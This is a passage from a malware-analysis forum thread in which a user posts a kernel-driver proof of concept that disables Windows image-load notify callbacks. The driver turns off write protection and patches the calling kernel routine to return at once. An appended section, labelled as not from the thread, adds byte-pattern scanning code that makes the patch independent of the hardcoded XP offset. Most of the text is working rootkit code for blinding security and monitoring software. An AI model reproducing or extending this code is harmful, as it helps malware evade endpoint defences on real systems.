A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about kernel-mode development.
 #11572  by R00tKit
 Sun Feb 12, 2012 12:07 pm
Hi,
This is a PoC that disables any callback registered with PsSetLoadImageNotifyRoutine (this method also works for other callbacks).
Maybe this idea is old, I don't know (this is for educational purposes only).
#include <ntddk.h>

// Helpers the PoC calls but did not show: clear/set CR0.WP so that writes to
// read-only kernel code pages succeed. x86 only (no inline asm on x64).
void DisableReadonly(void)
{
    __asm {
        push eax
        mov  eax, cr0
        and  eax, 0FFFEFFFFh    ; clear WP (bit 16)
        mov  cr0, eax
        pop  eax
    }
}

void EnableReadonly(void)
{
    __asm {
        push eax
        mov  eax, cr0
        or   eax, 10000h        ; set WP (bit 16)
        mov  cr0, eax
        pop  eax
    }
}

VOID callback(
    IN PUNICODE_STRING FullImageName,
    IN HANDLE          ProcessId,    // process the image is mapped into
    IN PIMAGE_INFO     ImageInfo
    )
{
    unsigned char *f;
    void          *pvReturn;
    void         **puEBP = NULL;

    UNREFERENCED_PARAMETER(FullImageName);
    UNREFERENCED_PARAMETER(ProcessId);
    UNREFERENCED_PARAMETER(ImageInfo);

    __asm { mov puEBP, ebp };             // our own frame pointer (requires EBP-based frames)
    pvReturn = puEBP[1];                  // saved return address: inside the kernel routine that called us
    f = (unsigned char *)pvReturn - 0x36; // XP SP3 only: distance from that call site back to the routine's entry

    DisableReadonly();
    f[0] = 0xC2;                          // ret 0Ch: the routine now returns immediately,
    f[1] = 0x0C;                          // popping its three DWORD arguments, so the
    f[2] = 0x00;                          // registered callbacks are never called again
    EnableReadonly();

    DbgPrint("kernel patched %p, %p\r\n", f, pvReturn);
}

Tested on XP SP3 (the offset is hardcoded; it can be made portable with a simple disassembler).

With a simple modification we can get the list of registered callbacks.

Use:
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNREFERENCED_PARAMETER(DriverObject);
    PsRemoveLoadImageNotifyRoutine(callback);
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverUnload = DriverUnload;
    DbgPrint("Hello World\n");
    // The patch is applied the first time the callback fires (next image load).
    return PsSetLoadImageNotifyRoutine(callback);
}
Thanks BlZbB for the help.
 #11610  by Vrtule
 Mon Feb 13, 2012 6:46 pm
I have not seen this technique before (as I have not seen many other techniques). But I have known about this possibility for a long time. Personally, I prefer pattern matching algorithms not dependent on my stack.
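The pattern-matching alternative Vrtule prefers, applied to the hardcoded 0x36 offset in R00tKit's PoC above: instead of a fixed distance from the callback's return address, scan backwards from that return address for the caller's prologue bytes and patch what you find. This is an added example, not code from the thread. It runs in user mode over constructed byte buffers; the PROLOGUE pattern (mov edi,edi; push ebp; mov ebp,esp), the fake_caller and tricky_caller buffers and the padding heuristic in looks_like_entry are assumptions of the example, not bytes read from an XP kernel.

```c
/* Added example (not from the thread): find the patch target by scanning
 * backwards from the callback's return address for the caller's prologue,
 * instead of using the fixed 0x36 offset. Runs in user mode on constructed
 * buffers; the byte patterns are assumptions, not bytes from an XP kernel. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hot-patchable prologue many 32-bit Windows kernel routines start with:
 * mov edi,edi ; push ebp ; mov ebp,esp */
static const uint8_t PROLOGUE[] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };

/* ret 0Ch: the three bytes the PoC writes over the routine's entry so it
 * returns at once, popping three DWORD stack arguments. */
static const uint8_t RET_0C[] = { 0xC2, 0x0C, 0x00 };

/* Heuristic (assumption): a real entry sits at the start of the scan window
 * or right after padding / the previous function's end (int 3, nop, ret).
 * This rejects the prologue byte sequence appearing inside an operand. */
static int looks_like_entry(const uint8_t *base, const uint8_t *p)
{
    if (p == base) return 1;
    return p[-1] == 0xCC || p[-1] == 0x90 || p[-1] == 0xC3;
}

/* Walk back from ret_addr (the address just after the call into the
 * callback, i.e. puEBP[1] in the PoC) at most max_back bytes and return the
 * caller's entry, or NULL. base bounds the scan so it never reads before
 * the buffer (in the kernel: the start of the code section). */
static const uint8_t *find_function_entry(const uint8_t *base,
                                          const uint8_t *ret_addr,
                                          size_t max_back)
{
    size_t off = (size_t)(ret_addr - base);
    if (off < sizeof PROLOGUE) return NULL;
    off -= sizeof PROLOGUE;
    for (;;) {
        const uint8_t *p = base + off;
        if (memcmp(p, PROLOGUE, sizeof PROLOGUE) == 0 && looks_like_entry(base, p))
            return p;
        if (off == 0 || (size_t)(ret_addr - p) >= max_back)
            return NULL;
        off--;
    }
}

/* Locate the caller's entry and overwrite it with ret 0Ch, as the PoC does
 * (in the kernel this is the part between DisableReadonly/EnableReadonly).
 * Returns the entry's offset from base, or -1 if no entry was found. */
static long patch_caller_entry(uint8_t *base, const uint8_t *ret_addr, size_t max_back)
{
    const uint8_t *entry = find_function_entry(base, ret_addr, max_back);
    if (entry == NULL) return -1;
    memcpy(base + (entry - base), RET_0C, sizeof RET_0C);
    return (long)(entry - base);
}

/* Constructed stand-in for the routine that calls the notify callbacks:
 * prologue, a little body, the pushed arguments and an indirect call.
 * Index 22 is the return address the callback would see in puEBP[1]. */
static uint8_t fake_caller[] = {
    0x8B, 0xFF, 0x55, 0x8B, 0xEC,                         /*  0: mov edi,edi; push ebp; mov ebp,esp */
    0x83, 0xEC, 0x10,                                     /*  5: sub esp,10h */
    0x53, 0x56, 0x57,                                     /*  8: push ebx; push esi; push edi */
    0xFF, 0x75, 0x10, 0xFF, 0x75, 0x0C, 0xFF, 0x75, 0x08, /* 11: push [ebp+10h]; push [ebp+0Ch]; push [ebp+8] */
    0xFF, 0xD6,                                           /* 20: call esi (the notify routine) */
    0x46,                                                 /* 22: return address lands here */
    0xC3,
};
static const size_t FAKE_RET = 22;

/* Same shape, but mov eax,8B55FF8Bh followed by in al,dx (constructed)
 * reproduces the prologue bytes inside the body at index 6. The padding
 * heuristic keeps the scanner from stopping there. */
static uint8_t tricky_caller[] = {
    0x8B, 0xFF, 0x55, 0x8B, 0xEC,   /*  0: real prologue */
    0xB8, 0x8B, 0xFF, 0x55, 0x8B,   /*  5: mov eax,8B55FF8Bh */
    0xEC,                           /* 10: in al,dx */
    0xFF, 0xD6,                     /* 11: call esi */
    0xC3,                           /* 13: return address lands here */
};
static const size_t TRICKY_RET = 13;

int main(void)
{
    long off = patch_caller_entry(fake_caller, fake_caller + FAKE_RET, 0x100);
    printf("entry at offset %ld, first bytes now %02X %02X %02X\n",
           off, fake_caller[0], fake_caller[1], fake_caller[2]);
    return off == 0 ? 0 : 1;
}
```

In a driver the scan window should be the image's code section and the result still deserves a sanity check (a disassembler, or at least confirming that the bytes at the found entry are what you expect), since the hot-patch prologue is not universal and the heuristic here is only a filter against the more obvious false positives.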